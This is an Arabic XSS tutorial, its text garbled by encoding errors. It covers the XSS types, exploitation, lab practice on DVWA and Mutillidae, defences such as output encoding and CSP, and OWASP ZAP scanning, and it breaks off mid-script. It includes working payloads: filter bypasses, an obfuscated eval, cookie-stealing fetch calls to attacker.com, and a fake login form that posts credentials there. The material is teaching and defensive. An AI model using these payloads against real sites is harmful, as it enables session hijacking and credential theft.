
      __  __            _    _               _             
     |  \/  | __ _ _ __| | _| |__   ___  ___| | _____ _ __ 
     | |\/| |/ _` | '__| |/ / '_ \ / _ \/ __| |/ / _ \ '__|
     | |  | | (_| | |  |   <| | | |  __/\__ \   <  __/ |   
     |_|  |_|\__,_|_|  |_|\_\_| |_|\___||___/_|\_\___|_|   
                                                          
  [ HACK THE PLANET ]   [ STAY LEGAL โ๏ธ ]   [ OWN THE SYSTEM ]





# ุฏุฑุณ ุดุงูู ุญูู ูุฌูุงุช XSS ูุงูุชุดุงููุง ุจุงุณุชุฎุฏุงู OWASP ZAP

## ๐ ููุฑุณ ุงููุญุชููุงุช
1. [ููุฏูุฉ ุนู XSS](#ููุฏูุฉ-ุนู-xss)
2. [ุฃููุงุน XSS](#ุฃููุงุน-xss)
3. [ููููุฉ ุงุณุชุบูุงู XSS (ุฃูุซูุฉ ุนูููุฉ)](#ููููุฉ-ุงุณุชุบูุงู-xss)
4. [ุจูุฆุฉ ุงูุงุฎุชุจุงุฑ โ Metasploitable](#ุจูุฆุฉ-ุงูุงุฎุชุจุงุฑ--metasploitable)
5. [ุงุณุชุฑุงุชูุฌูุงุช ุงูุญูุงูุฉ ูู XSS](#ุงุณุชุฑุงุชูุฌูุงุช-ุงูุญูุงูุฉ-ูู-xss)
6. [ููุฏูุฉ ุนู OWASP ZAP](#ููุฏูุฉ-ุนู-owasp-zap)
7. [ููููุฉ ุงุณุชุฎุฏุงู OWASP ZAP ูุงูุชุดุงู XSS](#ููููุฉ-ุงุณุชุฎุฏุงู-owasp-zap-ูุงูุชุดุงู-xss)
8. [ุฏูุฌ OWASP ZAP ูู CI/CD](#ุฏูุฌ-owasp-zap-ูู-cicd)
9. [ุฎุงุชูุฉ ุชุญููุฒูุฉ](#ุฎุงุชูุฉ-ุชุญููุฒูุฉ)

## ููุฏูุฉ ุนู XSS

### ูุง ูู XSSุ
Cross-Site Scripting (XSS) ูู ููุน ูู ูุฌูุงุช ุงูุฃูุงู ุงูุชู ุชุณุชูุฏู ุชุทุจููุงุช ุงูููุจุ ุญูุซ ูููู ุงูููุงุฌู ุจุญูู ุดููุฑุงุช JavaScript ุฎุจูุซุฉ ูู ุตูุญุงุช ุงูููุจ ุงูุชู ูุฑุงูุง ุงููุณุชุฎุฏููู ุงูุขุฎุฑูู. ุนูุฏูุง ูุชู ุชูููุฐ ูุฐู ุงูุดููุฑุงุช ูู ูุชุตูุญ ุงูุถุญูุฉุ ูููููุง ุณุฑูุฉ ูุนูููุงุช ูุซู ุฌูุณุงุช ุชุณุฌูู ุงูุฏุฎูู (ุงูููููุฒ)ุ ุฃู ุชุบููุฑ ูุญุชูู ุงููููุนุ ุฃู ุฅุนุงุฏุฉ ุชูุฌูู ุงููุณุชุฎุฏู ุฅูู ููุงูุน ุฃุฎุฑู.

### ููุงุฐุง ุชุนุชุจุฑ XSS ุฎุทูุฑุฉุ
1. ูููู ุฃู ุชุคุฏู ุฅูู ุณุฑูุฉ ูููุฉ ุงููุณุชุฎุฏู
2. ุชุณูุญ ููููุงุฌู ุจุชุดุบูู ุดููุฑุงุช ุจุฑูุฌูุฉ ูู ุณูุงู ุฌูุณุฉ ุงููุณุชุฎุฏู
3. ูููู ุงุณุชุฎุฏุงููุง ููุดุฑ ุงูุจุฑูุฌูุงุช ุงูุฎุจูุซุฉ
4. ุชุณุชุทูุน ุชุนุฏูู ูุญุชูู ุตูุญุงุช ุงูููุจ ุงูุชู ูุฑุงูุง ุงููุณุชุฎุฏู
5. ุชุญุชู ุงููุฑุชุจุฉ ุงูุซุงูุซุฉ ูู ูุงุฆูุฉ OWASP Top 10 ููุชูุฏูุฏุงุช ุงูุฃูููุฉ

### ASCII Art ุชูุซูู XSS

```
+----------------+       +------------------+        +----------------+
|                |       |                  |        |                |
|    ุงูููุงุฌู     | -----> |   ูููุน ูุตุงุจ     | ------> |   ุงูุถุญูุฉ      |
|                |       |                  |        |                |
+----------------+       +------------------+        +----------------+
     |                                                      |
     |           ุญูู ุดููุฑุฉ JavaScript ุฎุจูุซุฉ                  |
     |                                                      V
     |                  +------------------------+          |
     +----------------> |  ุชูููุฐ ุงูุดููุฑุฉ ุงูุฎุจูุซุฉ  | <--------+
                        |  ูู ูุชุตูุญ ุงูุถุญูุฉ      |
                        +------------------------+
```

### ุชูุฑูู ุจุณูุท ููููุฏูุฉ
**ุงูุณุคุงู**: ูุง ูู ุงููุนูููุงุช ุงูุชู ูููู ููููุงุฌู ุงูุญุตูู ุนูููุง ูู ุฎูุงู ูุฌูู XSS ูุงุฌุญุ ุงุฐูุฑ ุซูุงุซุฉ ุฃูุซูุฉ.

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**: 
1. ุจูุงูุงุช ุฌูุณุฉ ุงููุณุชุฎุฏู (ุงูููููุฒ)
2. ุจูุงูุงุช ุงูููุงุฐุฌ (ูููุงุช ุงููุฑูุฑุ ุฃุฑูุงู ุจุทุงูุงุช ุงูุงุฆุชูุงู)
3. ุชุตูุญ ุงููุณุชุฎุฏู ูุชูุงุนูุงุชู ูุน ุงููููุน

## ุฃููุงุน XSS

### 1. Reflected XSS (ุงูุงูุนูุงุณู)
ูุฐุง ุงูููุน ูุญุฏุซ ุนูุฏูุง ูุชู ุฅุฑุณุงู ุงูุจูุงูุงุช ุงูุฎุจูุซุฉ ุฅูู ุฎุงุฏู ุงูููุจุ ุซู ูุชู "ุนูุณูุง" ูุจุงุดุฑุฉ ูู ุงุณุชุฌุงุจุฉ ุงูุฎุงุฏู ุฏูู ุฃู ูุนุงูุฌุฉ ุฃู ุชุญูู. ูุซุงู ุดุงุฆุน ูู ุนูุฏูุง ูุชู ุฅุฏุฎุงู ุงูุดููุฑุฉ ุงูุฎุจูุซุฉ ูู ุงุณุชุนูุงู ุจุญุซ ุฃู ูููุฐุฌ ููุจ.

**ูุซุงู ุจุณูุท**:
```
https://example.com/search?q=<script>alert('XSS')</script>
```

ุฅุฐุง ูุงู ุงููููุน ุจุนุฑุถ ูุตุทูุญ ุงูุจุญุซ ุฏูู ุชุฑููุฒ ุงูุฃุญุฑู ุงูุฎุงุตุฉุ ุณูุชู ุชูููุฐ ุงูุณูุฑูุจุช ูู ูุชุตูุญ ุงููุณุชุฎุฏู.

### 2. Stored XSS (ุงููุฎุฒู)
ูู ูุฐุง ุงูููุนุ ูุชู ุชุฎุฒูู ุงูุดููุฑุฉ ุงูุฎุจูุซุฉ ุจุดูู ุฏุงุฆู ุนูู ุงููููุน ุงููุณุชูุฏู (ูุซู ูุงุนุฏุฉ ุงูุจูุงูุงุช)ุ ุซู ูุชู ุงุณุชุฑุฌุงุนูุง ูุชูููุฐูุง ูุงุญูุงู ุนูุฏูุง ูุฒูุฑ ุงููุณุชุฎุฏููู ุงูุตูุญุฉ ุงููุตุงุจุฉ. ูุฐุง ุงูููุน ุฃูุซุฑ ุฎุทูุฑุฉ ูุฃูู ูุคุซุฑ ุนูู ุฌููุน ุฒูุงุฑ ุงูุตูุญุฉ.

**ูุซุงู**:
ุชุนููู ูู ููุชุฏู ูุญุชูู ุนูู ุดููุฑุฉ JavaScript ุฎุจูุซุฉ:
```
ูุฑุญุจุงูุ ุชุนููู ุฑุงุฆุน!
<script>
  let stolenCookie = document.cookie;
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));
</script>
```

### 3. DOM-based XSS (ุงููุนุชูุฏ ุนูู DOM)
ูุญุฏุซ ูุฐุง ุงูููุน ุนูุฏูุง ูุชู ุชูููุฐ ุงูุดููุฑุฉ ุงูุฎุจูุซุฉ ูู ุฎูุงู ุชุนุฏูู ุจููุฉ DOM ููุตูุญุฉ ูู ุงููุชุตูุญุ ุฏูู ุฃู ุชูุงุนู ูุน ุงูุฎุงุฏู. ูุณุชุฎุฏู ูุฐุง ุงูููุน ุบุงูุจุงู JavaScript ุนูู ุฌุงูุจ ุงูุนููู ููุนุงูุฌุฉ ุงูุจูุงูุงุช ุบูุฑ ุงูููุซููุฉ.

**ูุซุงู**:
```javascript
// ุดููุฑุฉ ุฌุงูุงุณูุฑูุจุช ุนูู ุงููููุน
const username = location.hash.substring(1); // ูู URL #fragment
document.getElementById("greeting").innerHTML = "ูุฑุญุจุงูุ " + username;
```

ุฅุฐุง ูุงู ุงููุณุชุฎุฏู ุจุฒูุงุฑุฉ ุงููููุน ุจู URL ูุซู:
```
https://example.com/page#<img src=x onerror=alert('XSS')>
```
ุณูุชู ุชูููุฐ ุงูุดููุฑุฉ ุงูุฎุจูุซุฉ ุนูุฏ ุชุญููู ุงูุตูุญุฉ.

### ุชูุซูู ASCII ูุฃููุงุน XSS

```
1. Reflected XSS:
ูุณุชุฎุฏู --------> ุฎุงุฏู --------> ูุณุชุฎุฏู (ููุณู)
(ูุฑุณู ุดููุฑุฉ)     (ูุนูุณูุง)       (ูููุฐ ุงูุณูุฑูุจุช)

2. Stored XSS:
ููุงุฌู --------> ุฎุงุฏู <-------- ุถุญุงูุง ูุชุนุฏุฏุฉ
(ูุฑุณู ุดููุฑุฉ)    (ูุฎุฒููุง)        (ูููุฐูู ุงูุณูุฑูุจุช)

3. DOM-based XSS:
ูุณุชุฎุฏู --> ูุชุตูุญ --> DOM --> ุณูุฑูุจุช
(ูุฏุฎู ุดููุฑุฉ)   (ูุนุงูุฌูุง ูุญููุงู ุจุฏูู ุงูุฎุงุฏู)
```

### ุชูุฑูู ุฃููุงุน XSS
**ุงูุณุคุงู**: ุฃู ููุน ูู XSS ูุนุชุจุฑ ุงูุฃูุซุฑ ุฎุทูุฑุฉ ูููุงุฐุงุ

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**: 
ุงูููุน ุงููุฎุฒู Stored XSS ูู ุงูุฃูุซุฑ ุฎุทูุฑุฉ ูุฃูู ูุคุซุฑ ุนูู ุฌููุน ุงููุณุชุฎุฏููู ุงูุฐูู ูุฒูุฑูู ุงูุตูุญุฉ ุงููุตุงุจุฉุ ูููุณ ููุท ูุณุชุฎุฏู ูุงุญุฏ. ููุง ุฃูู ุฏุงุฆู ููููู ุฃู ูุณุชูุฑ ููุชุฑุฉ ุทูููุฉ ุญุชู ูุชู ุงูุชุดุงูู.

## ููููุฉ ุงุณุชุบูุงู XSS

### ุฃุณุงุณูุงุช ุงูุงุณุชุบูุงู
ูููู ููู ูุชู ุงุณุชุบูุงู ุซุบุฑุงุช XSSุ ุณูุจุฏุฃ ุจุฃูุซูุฉ ุจุณูุทุฉ ุซู ููุชูู ุฅูู ุณููุงุฑูููุงุช ุฃูุซุฑ ุชุนููุฏุงู.

#### ูุซุงู 1: ุชูุจูู ุจุณูุท ููุชุญูู ูู ุงูุซุบุฑุฉ
```html
<script>alert('XSS');</script>
```
ูุฐุง ูู ุฃุจุณุท ุงุฎุชุจุงุฑ ููุชุญูู ูู ูุฌูุฏ ุซุบุฑุฉ XSS. ุฅุฐุง ุชู ุชูููุฐ ุงูุดููุฑุฉุ ุณูุธูุฑ ูุฑุจุน ุชูุจูู ุนูู ุงููุชุตูุญ.

#### ูุซุงู 2: ุณุฑูุฉ ููููุฒ ุฌูุณุฉ ุงููุณุชุฎุฏู
```html
<script>
fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>
```
ุชููู ูุฐู ุงูุดููุฑุฉ ุจุฅุฑุณุงู ููููุฒ ุงููุณุชุฎุฏู ุฅูู ุฎุงุฏู ุงูููุงุฌู.

#### ูุซุงู 3: ุชุฒููู ูููุฐุฌ ุชุณุฌูู ุงูุฏุฎูู
```html
<div style="position:fixed; top:0; left:0; width:100%; height:100%; background-color:white; z-index:1000;">
  <h3>ุงูุชูุช ุฌูุณุชูุ ุงูุฑุฌุงุก ุฅุนุงุฏุฉ ุชุณุฌูู ุงูุฏุฎูู</h3>
  <form action="https://attacker.com/steal" method="post">
    ุงุณู ุงููุณุชุฎุฏู: <input type="text" name="username"><br>
    ูููุฉ ุงููุฑูุฑ: <input type="password" name="password"><br>
    <input type="submit" value="ุชุณุฌูู ุงูุฏุฎูู">
  </form>
</div>
```
ูุฐู ุงูุดููุฑุฉ ุชุนุฑุถ ูููุฐุฌ ุชุณุฌูู ุฏุฎูู ูุฒูู ูุฑุณู ุงูุจูุงูุงุช ุฅูู ุฎุงุฏู ุงูููุงุฌู.

### ุชุฌุงูุฒ ุชูููุงุช ุงูุญูุงูุฉ

#### ุชุฌุงูุฒ ููุชุฑุฉ ุงูุนูุงูุงุช `<script>`
```html
<img src="x" onerror="alert('XSS')">
<body onload="alert('XSS')">
<svg onload="alert('XSS')">
```

#### ุงุณุชุฎุฏุงู ุงูุชุดููุฑ ูุชุฑููุฒ ุงูุฃุญุฑู
```html
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41));</script>
```
ูุฐุง ูุนุงุฏู `alert('XSS')` ููู ุจุงุณุชุฎุฏุงู ุชุฑููุฒ ASCII ููุฃุญุฑู.

#### ุงุณุชุฎุฏุงู JavaScript URI
```html
<a href="javascript:alert('XSS')">ุงููุฑ ููุง</a>
```

### ุฃุฏูุงุช ูููุฏุฉ ูุงุฎุชุจุงุฑ XSS
1. **XSS Hunter**: ุฃุฏุงุฉ ูุชูุฏูุฉ ูุงูุชุดุงู ูุชุญููู ุซุบุฑุงุช XSS
2. **BeEF (Browser Exploitation Framework)**: ุฅุทุงุฑ ุนูู ูุงุณุชุบูุงู ุซุบุฑุงุช ุงููุชุตูุญ
3. **OWASP ZAP**: ุณูุชุญุฏุซ ุนูู ุจุงูุชูุตูู ูุงุญูุงู

### ุชูุฑูู ุงุณุชุบูุงู XSS
**ุงูุณุคุงู**: ุงูุชุจ ุดููุฑุฉ XSS ุชููู ุจุชุบููุฑ ุฌููุน ุงูุตูุฑ ูู ุงูุตูุญุฉ ุฅูู ุตูุฑุฉ ุฃุฎุฑู (ุจุฏูู ุงุณุชุฎุฏุงู ุนูุงูุฉ `<script>` ูุจุงุดุฑุฉ).

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**:
```html
<img src="x" onerror="document.querySelectorAll('img').forEach(img => img.src = 'https://example.com/new-image.jpg')">
```

## ุจูุฆุฉ ุงูุงุฎุชุจุงุฑ โ Metasploitable

Metasploitable ูู ุจูุฆุฉ ููููุณ ูุชุนูุฏุฉ ุงูุถุนู ุฃูููุงู ูุตููุฉ ููุชุฏุฑูุจ ุนูู ุงุฎุชุจุงุฑ ุงูุงุฎุชุฑุงู ููุญุต ุงูุฃูุงู. ุชุชุถูู ุงูุนุฏูุฏ ูู ุงูุชุทุจููุงุช ุงูุถุนููุฉ ุงูุชู ูููู ุงุณุชุฎุฏุงููุง ูููุงุฑุณุฉ ุงูุชุดุงู ูุงุณุชุบูุงู ุซุบุฑุงุช XSS.

### ุฅุนุฏุงุฏ ุจูุฆุฉ Metasploitable
1. ูู ุจุชูุฒูู ุตูุฑุฉ Metasploitable ูู ุงููููุน ุงูุฑุณูู
2. ูู ุจุชุซุจูุชูุง ุนูู ูุธุงู ุงูุชุฑุงุถู ูุซู VirtualBox ุฃู VMware
3. ุดุบู ุงูุฌูุงุฒ ุงูุงูุชุฑุงุถู ูุณุฌู ุงูุฏุฎูู (ุงุณู ุงููุณุชุฎุฏู ููููุฉ ุงููุฑูุฑ ุงูุงูุชุฑุงุถูุฉ ูู `msfadmin`)

### ุชุทุจููุงุช ุถุนููุฉ ููุงุฎุชุจุงุฑ
1. **DVWA (Damn Vulnerable Web Application)**
   - ุชุทุจูู ููุจ ูุชุนูุฏ ุงูุถุนู ุจูุณุชููุงุช ูุชุนุฏุฏุฉ ูู ุงูุตุนูุจุฉ
   - ูููู ุงููุตูู ุฅููู ุนุจุฑ `http://[IP-Metasploitable]/dvwa/`

2. **Mutillidae**
   - ุชุทุจูู ููุจ ุถุนูู ุขุฎุฑ ูุชุถูู ุซุบุฑุงุช OWASP Top 10
   - ูููู ุงููุตูู ุฅููู ุนุจุฑ `http://[IP-Metasploitable]/mutillidae/`

### ุฎุทูุงุช ุงุฎุชุจุงุฑ XSS ูู DVWA
1. ุชุณุฌูู ุงูุฏุฎูู ุจุงุณุชุฎุฏุงู `admin/password`
2. ุงุฎุชุฑ "XSS (Reflected)" ุฃู "XSS (Stored)" ูู ุงููุงุฆูุฉ
3. ูู ุจุชุนููู ูุณุชูู ุงูุตุนูุจุฉ ุฅูู "Low" ููุจุฏุงูุฉ
4. ุงุณุชุฎุฏู ุงูุฃูุซูุฉ ุงููุฐููุฑุฉ ุณุงุจูุงู ูุงุฎุชุจุงุฑ ุงูุซุบุฑุงุช

### ุฎุทูุงุช ุงุฎุชุจุงุฑ XSS ูู Mutillidae
1. ุงูุชูู ุฅูู "OWASP Top 10" > "A7 - Cross Site Scripting"
2. ุงุฎุชุฑ ุฃุญุฏ ุงูุชูุงุฑูู ุงููุชุงุญุฉ ูุซู "DNS Lookup" ุฃู "Add to your blog"
3. ุงุณุชุฎุฏู ูุฎุชูู ุชูููุงุช XSS ููุงุฎุชุจุงุฑ

### ุชูุฑูู ุจูุฆุฉ ุงูุงุฎุชุจุงุฑ
**ุงูุณุคุงู**: ูู DVWAุ ูุง ุงููุฑู ุจูู ูุณุชููุงุช ุงูุตุนูุจุฉ ุงููุฎุชููุฉ (Low, Medium, High) ูู ุฃูุงู XSSุ

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**:
- **Low**: ูุง ููุฌุฏ ุชุฑููุฒ ุฃู ุชุตููุฉ ูููุฏุฎูุงุช
- **Medium**: ุจุนุถ ุงูุชุฑููุฒ ุงูุจุณูุท ุฃู ุงุณุชุฎุฏุงู ุชุนุจูุฑุงุช ููุชุธูุฉ ูููุน ุจุนุถ ุงููุฌูุงุช
- **High**: ุชุฑููุฒ ุฃูุซุฑ ุชุนููุฏุงู ูุชุตููุฉ ุฃูุซุฑ ุตุฑุงูุฉ ุชุชุทูุจ ุชูููุงุช ูุชูุฏูุฉ ููุชุฌุงูุฒ

## ุงุณุชุฑุงุชูุฌูุงุช ุงูุญูุงูุฉ ูู XSS

### 1. ุชุฑููุฒ ุงููุฎุฑุฌุงุช (Output Encoding)
ุชุฑููุฒ ุงููุฎุฑุฌุงุช ูู ุงูุฎุท ุงูุฏูุงุนู ุงูุฃูู ุถุฏ ูุฌูุงุช XSS. ูุนูู ุชุญููู ุงูุฃุญุฑู ุงูุฎุงุตุฉ ูุซู `<` ู `>` ู `"` ู `'` ุฅูู ุฑููุฒ HTML ูุซู `&lt;` ู `&gt;` ู `&quot;` ู `&#x27;`.

```javascript
// ูุซุงู ููุชุฑููุฒ ูู JavaScript
function escapeHTML(str) {
    return str
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#x27;')
        .replace(/\//g, '&#x2F;');
}

// ูู PHP
$escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

// ูู Java
String escaped = StringEscapeUtils.escapeHtml4(input);
```

### 2. ุงุณุชุฎุฏุงู ููุชุจุงุช ูุฅุทุงุฑุงุช ุนูู ุขููุฉ
ูุนุธู ุฅุทุงุฑุงุช ุงูุนูู ุงูุญุฏูุซุฉ ูุซู React ูAngular ูVue.js ุชููู ุจุชุฑููุฒ ุงููุฎุฑุฌุงุช ุชููุงุฆูุงูุ ููุง ูููู ูู ุฎุทุฑ XSS.

```javascript
// React ูููู ุจุชุฑููุฒ ุงููุญุชูู ุชููุงุฆูุงู
const userInput = "<script>alert('XSS')</script>";
return <div>{userInput}</div>; // ุขูู ุจุดูู ุงูุชุฑุงุถู

// ููู ูุฌุจ ุงูุญุฐุฑ ุนูุฏ ุงุณุชุฎุฏุงู dangerouslySetInnerHTML
return <div dangerouslySetInnerHTML={{ __html: userInput }} />; // ุฎุทูุฑ!
```

### 3. ุงูุชุญูู ูู ุตุญุฉ ุงููุฏุฎูุงุช (Input Validation)
ุชุญูู ุฏุงุฆูุงู ูู ุงููุฏุฎูุงุช ูุจู ูุนุงูุฌุชูุงุ ูุฎุงุตุฉ ุนูุฏ ุงูุชุญูู ูู ุฌุงูุจ ุงูุฎุงุฏู.

```php
// ูุซุงู ูู PHP
function isValidInput($input) {
    // ุชุญูู ูู ุฃู ุงููุฏุฎูุงุช ุชุญุชูู ููุท ุนูู ุฃุญุฑู ูุฃุฑูุงู
    return preg_match('/^[a-zA-Z0-9]+$/', $input);
}

if (isValidInput($_POST['username'])) {
    // ูุนุงูุฌุฉ ุงููุฏุฎูุงุช
} else {
    // ุฑูุถ ุงููุฏุฎูุงุช
}
```

### 4. ุงุณุชุฎุฏุงู ุณูุงุณุฉ ุฃูุงู ุงููุญุชูู (Content Security Policy - CSP)
CSP ูู ุทุจูุฉ ุฅุถุงููุฉ ูู ุงูุญูุงูุฉ ุชุณูุญ ูู ุจุชุญุฏูุฏ ุงููุตุงุฏุฑ ุงููุณููุญ ุจูุง ูููุญุชูู ุงูุฐู ูุชู ุชุญูููู ูู ุตูุญุชู.

```html
<!-- ุฅุถุงูุฉ CSP ุนุจุฑ ูุณู meta -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' https://trusted-cdn.com;">

<!-- ุฃู ุนุจุฑ HTTP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;
```

### 5. ุงุณุชุฎุฏุงู ุนูุงูุงุช HttpOnly ูSecure ููููููุฒ
ููุน ุงููุตูู ุฅูู ุงูููููุฒ ุนุจุฑ JavaScript ูููู ุฃู ูุญูููุง ูู ูุฌูุงุช ุณุฑูุฉ ุงูุฌูุณุฉ.

```php
// ูุซุงู ูู PHP
setcookie("sessionid", $value, [
    'expires' => time() + 3600,
    'path' => '/',
    'domain' => 'example.com',
    'secure' => true,
    'httponly' => true,
    'samesite' => 'Strict'
]);
```

### ุชูุฑูู ุงุณุชุฑุงุชูุฌูุงุช ุงูุญูุงูุฉ
**ุงูุณุคุงู**: ูุฏู ูุซุงูุงู ูุณูุงุณุฉ ุฃูุงู ูุญุชูู (CSP) ุชุณูุญ ุจุชุดุบูู ุงูุณูุฑูุจุชุงุช ููุท ูู ุงูุฎุงุฏู ุงูุฃุตูู ูุฎุงุฏู Google Analytics.

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**:
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://www.google-analytics.com;
```

## ููุฏูุฉ ุนู OWASP ZAP

### ูุง ูู OWASP ZAPุ
OWASP Zed Attack Proxy (ZAP) ูู ุฃุฏุงุฉ ูุญุต ุฃููู ููุชูุญุฉ ุงููุตุฏุฑ ุชุณุชุฎุฏู ูุงูุชุดุงู ุงูุซุบุฑุงุช ุงูุฃูููุฉ ูู ุชุทุจููุงุช ุงูููุจ. ุชู ุชุทููุฑู ูู ูุจู ูุดุฑูุน OWASP ููู ุฃุญุฏ ุฃูุซุฑ ุฃุฏูุงุช ุงููุญุต ุงูุฃููู ุงุณุชุฎุฏุงูุงู ุจูู ุงููุชุฎุตุตูู.

### ูููุฒุงุช OWASP ZAP
1. ุงูุชุดุงู ุขูู ููุซุบุฑุงุช ุงูุฃูููุฉ
2. ูุถุน ุงูุงุนุชุฑุงุถ (Intercepting Proxy)
3. ูุญุต ุงูุณุจุงูุฏุฑ ูุงูุชุดุงู ุงูุฑูุงุจุท ูุงูุตูุญุงุช
4. ูุณุญ ุฃููู ูุดุท ูุณูุจู
5. ุชุญููู API ูุฎุฏูุงุช ุงูููุจ
6. ุจุฑูุฌุฉ ุณูุฑูุจุชุงุช ูููุญุต ุงููุฎุตุต
7. ูุญุฑู ููุงุนุฏ ูููุดู ุนู ุงูุซุบุฑุงุช
8. ุฃุฏุงุฉ ูุญุต Fuzzing

### ุชุซุจูุช OWASP ZAP
1. ูู ุจุชูุฒูู ZAP ูู ุงููููุน ุงูุฑุณูู: [https://www.zaproxy.org/download/](https://www.zaproxy.org/download/)
2. ุซุจุช ุงูุจุฑูุงูุฌ ุญุณุจ ูุธุงู ุงูุชุดุบูู ุงูุฎุงุต ุจู
3. ุดุบู ุงูุจุฑูุงูุฌ ููู ุจุชููุฆุฉ ุงููุชุตูุญ ูุงุณุชุฎุฏุงู ZAP ููุณูุท

```
+------------+       +-------------+       +---------------+
|            |       |             |       |               |
| ุงููุชุตูุญ    | <---> |  OWASP ZAP  | <---> | ูููุน ุงููุฏู    |
|            |       |             |       |               |
+------------+       +-------------+       +---------------+
                           |
                           V
                    +-------------+
                    | ุชูุฑูุฑ ุฃููู  |
                    +-------------+
```

### ูุงุฌูุฉ ุงููุณุชุฎุฏู ุงูุฑุฆูุณูุฉ ูู ZAP
1. **Sites Tab**: ูุนุฑุถ ุงููููู ุงููุฑูู ููููุงูุน ุงูุชู ุชู ูุญุตูุง
2. **Request/Response Tabs**: ุนุฑุถ ุงูุทูุจุงุช ูุงูุงุณุชุฌุงุจุงุช
3. **Spider**: ูุงุณุชูุดุงู ุงููููุน ุงููุณุชูุฏู
4. **Active Scan**: ููุจุญุซ ุนู ุงูุซุบุฑุงุช ุจูุดุงุท
5. **Alerts Tab**: ูุนุฑุถ ุงูุชุญุฐูุฑุงุช ูุงูุซุบุฑุงุช ุงูููุชุดูุฉ

### ุชูุฑูู ููุฏูุฉ OWASP ZAP
**ุงูุณุคุงู**: ูุง ุงููุฑู ุจูู ุงููุญุต ุงููุดุท (Active Scan) ูุงููุญุต ุงูุณูุจู (Passive Scan) ูู ZAPุ

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**:
- **ุงููุญุต ุงูุณูุจู**: ูุฑุงูุจ ุญุฑูุฉ ุงููุฑูุฑ ุจูู ุงููุชุตูุญ ูุงูุฎุงุฏู ุฏูู ุฅุฑุณุงู ุทูุจุงุช ุฅุถุงููุฉ. ุขูู ููุง ูุคุซุฑ ุนูู ุงููููุน.
- **ุงููุญุต ุงููุดุท**: ูุฑุณู ุทูุจุงุช ุฅุถุงููุฉ ูุญุชููุฉ ุงูุถุฑุฑ ูููุดู ุนู ุงูุซุบุฑุงุช. ุฃูุซุฑ ุดููููุฉ ูููู ูููู ุฃู ูุคุซุฑ ุนูู ุงููููุน ุงููุณุชูุฏู.

## ููููุฉ ุงุณุชุฎุฏุงู OWASP ZAP ูุงูุชุดุงู XSS

### ุงูุฅุนุฏุงุฏ ุงูุฃููู
1. ูู ุจุชุดุบูู ZAP ูุชูููู ุงููุชุตูุญ ูุงุณุชุฎุฏุงู ZAP ููุณูุท
2. ุฃุฏุฎู ุนููุงู URL ูููููุน ุงููุฑุงุฏ ูุญุตู ูู ูุฑุจุน ุงูู "Quick Start"
3. ุงููุฑ ุนูู "Attack" ููุจุฏุก ุจุงููุญุต ุงูุฃุณุงุณู

### ุทุฑููุฉ ุงููุญุต ุงููุฏูู ููู XSS
1. ุงุณุชุฎุฏู ุฃุฏุงุฉ Spider ูุงูุชุดุงู ุตูุญุงุช ุงููููุน
   ```
   Sites โ Right-click on target site โ Attack โ Spider
   ```

2. ุญุฏุฏ ุงูููุงุฐุฌ ูุงููุนููุงุช ุงูุชู ุชุฑูุฏ ุงุฎุชุจุงุฑูุง
   ```
   Sites โ Expand target site โ Find a form or parameter
   ```

3. ุงุณุชุฎุฏู ูุถุน ุงูุงุนุชุฑุงุถ (Intercept) ูุงุฎุชุจุงุฑ ุงูุซุบุฑุงุช ูุฏููุงู
   ```
   Tools โ Options โ Breakpoints โ Set breakpoints on all requests/responses
   ```

4. ุฃุฏุฎู ุฃููุงุฏ XSS ูู ุงูุญููู ูุชุญูู ูู ุงูุฑุฏูุฏ

### ุงุณุชุฎุฏุงู ุงููุญุต ุงููุดุท ููู XSS
1. ูู ุจุชูุนูู ุณูุงุณุงุช ุงููุญุต ุงููุดุท ููู XSS
   ```
   Scan Policy Manager โ New โ Check "Cross Site Scripting (Reflected)" and "Cross Site Scripting (Stored)"
   ```

2. ุงุจุฏุฃ ุงููุญุต ุงููุดุท
   ```
   Sites โ Right-click on target site โ Attack โ Active Scan
   ```

3. ุฑุงุฌุน ูุชุงุฆุฌ ุงููุญุต ูู ุนูุงูุฉ ุงูุชุจููุจ "Alerts"

### ุงุณุชุฎุฏุงู ุฃุฏุงุฉ Fuzzer
1. ุงุนุชุฑุถ ุทูุจ ูุญุชูู ุนูู ูุนููุฉ ูุฏ ุชููู ุนุฑุถุฉ ููู XSS
2. ุงููุฑ ุจุฒุฑ ุงููุงูุณ ุงูุฃููู ุนูู ุงูุทูุจ โ "Fuzz"
3. ุญุฏุฏ ุงููุนููุฉ ุงูุชู ุชุฑูุฏ ุงุฎุชุจุงุฑูุง
4. ุฃุถู ูุงุฆูุฉ Fuzz ูู ุงูููุงุฆู ุงูุฌุงูุฒุฉ ุฃู ุฃูุดุฆ ูุงุฆูุฉ ูุฎุตุตุฉ ุจุฃููุงุฏ XSS
   ```
   Add โ File Fuzzers โ select "jbrofuzz/xss"
   ```
5. ุงููุฑ ุนูู "Start Fuzzer" ูุชุญูู ูู ุงููุชุงุฆุฌ

### ูุชุงุจุฉ ุณูุฑูุจุชุงุช ูุฎุตุตุฉ ูููุดู ุนู XSS
ููููู ูุชุงุจุฉ ุณูุฑูุจุชุงุช Python ุฃู JavaScript ูุฎุตุตุฉ ูููุดู ุนู ุซุบุฑุงุช XSS ุบูุฑ ุงูุชูููุฏูุฉ:

```javascript
// ูุซุงู ูุณูุฑูุจุช JavaScript ูู ZAP
function scan(as, msg, param, value) {
    // ุญูู ููุฏ XSS ูุฎุตุต
    var customXss = '<img src=x onerror=alert("CUSTOM_XSS_' + param + '")>';
    
    // ุฅุฑุณุงู ุทูุจ ุงุฎุชุจุงุฑ
    var testMsg = msg.cloneRequest();
    as.setParam(testMsg, param, customXss);
    
